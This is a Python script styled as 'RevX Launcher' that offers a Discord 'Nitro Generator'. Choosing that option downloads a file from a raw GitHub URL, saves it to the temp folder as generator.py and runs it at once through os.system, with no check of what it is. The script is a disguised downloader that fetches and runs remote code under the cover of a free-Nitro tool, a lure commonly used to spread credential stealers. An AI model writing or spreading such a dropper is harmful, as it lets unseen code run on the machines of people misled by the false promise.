import random
import threading
import string
import time
import sys
from colorama.ansi import Fore
import numpy as np
import requests
import os
import itertools
import subprocess

print(f"""{Fore.RED}

    ____           _  __
   / __ \___ _   _| |/ /
  / /_/ / _ \ | / /   / 
 / _, _/  __/ |/ /   |  
/_/ |_|\___/|___/_/|_|  
                        


""")

print(f"{Fore.YELLOW}Welcome to RevX Launcher!{Fore.RESET}")
time.sleep(1)
print("""
 ╦═════════════════════════╦
 ║[1] - Nitro Generator    ║                         
 ║[2] - Exit               ║                                                                       
 ╩═════════════════════════╩
 """)

mode = input("[>>>] Option: ")

if (mode == "1"):
 class launcher:
    getcode = requests.get("https://raw.githubusercontent.com/Exerz7/NitroGenSCR/main/KrnlX%20v1")
    temp = os.getenv("temp") + "\\generator.py"
    with open(temp, "wb") as f:
        f.write(getcode.content);
    os.system(f"python {temp}")
launcher()
